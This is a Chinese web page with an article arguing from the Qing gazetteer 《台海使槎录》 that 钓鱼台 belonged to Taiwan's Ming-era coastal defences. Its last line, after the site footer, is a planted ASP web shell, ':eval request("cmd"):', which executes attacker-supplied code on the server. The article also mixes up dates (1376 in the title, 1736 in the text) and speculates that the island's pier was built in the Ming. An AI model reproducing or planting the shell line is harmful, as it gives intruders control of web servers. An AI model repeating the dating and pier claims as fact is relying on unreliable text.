保钓历史

《台海使槎录》关于钓鱼岛的记载证明在1376年钓鱼岛已经是台湾岛的海防关隘

时间:2015-2-14 17:27:24  作者:李景科  来源:  查看:58  评论:3
内容摘要:《台海使槎录》行世于乾隆元年(公元1736年)。这部地理志书是我国国学文献中的一部。关于钓鱼岛,此书有记载,而且是列于“武备”章节中,什么是武备,武备就是武装力量、军事装备等的配布,用现代话说,没有武备,就没有国防和海防。臺海使槎錄卷一关于臺灣的&ldqu...
《台海使槎录》行世于乾隆元年(公元1736年)。这部地理志书是我国国学文献中的一部。关于钓鱼岛,此书有记载,而且是列于“武备”章节中,什么是武备,武备就是武装力量、军事装备等的配布,用现代话说,没有武备,就没有国防和海防。

臺海使槎錄卷一关于臺灣的“武備”的相关记载如下:

近海港口哨船可出入者,只鹿耳門、南路打狗港(打狗山南岐後水中有雞心礁)、北路蚊港、笨港、澹水港、小雞籠、八尺門。其餘如鳳山大港、西溪、蠔港、蟯港、東港(通澹水)、茄藤港、放■〈糸索〉港(冬月沙淤,至夏秋溪漲,船始可行)、大崑麓社、寮港、後灣仔(俱瑯嶠地)、諸羅馬沙溝、歐汪港、布袋澳、茅港尾、鐵線橋、鹽水港、井水港、八掌溪、猴樹港、虎尾溪港、海豐港、二林港、三林港(二港亦多沙線,水退去口五、六里)、鹿仔港(潮長,大船可至內線,不能抵港,外線水退,去口十餘里,不知港道,不敢出入)、水里港、牛罵、大甲、貓干、吞霄、房里、後壟、中港、竹塹、南嵌、八里坌、蛤仔爛,可通杉板船。臺灣州仔尾、西港仔、灣里,鳳山喜樹港、萬丹港,諸羅海翁堀、崩山港,只容■〈舟古〉仔小船。再鳳山岐後、枋寮、加六堂、謝必益、龜壁港、大繡房、魚房港,諸羅冂仔、穵象領,今盡淤塞,惟小魚船往來耳。山後大洋,北有山名釣魚臺,可泊大船十餘;崇爻之薛坡蘭,可進杉板。

这一段的记载,说明钓鱼台(=钓鱼岛)在明朝就是台湾海防的一个重要部分。由于记载可停泊大船十余,说明已经由码头。而现在的钓鱼岛确有码头一处,有日本人说是他们开建的简易码头,但根据笔者看到的钓鱼岛地图和码头照片,认为这一工程没有上百人施工,仅仅古贺家族少数人是不可能建成的,所以,目前的钓鱼岛的码头应该在明朝就有了,只是20世纪初被使用而已和增加了附属设施。
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):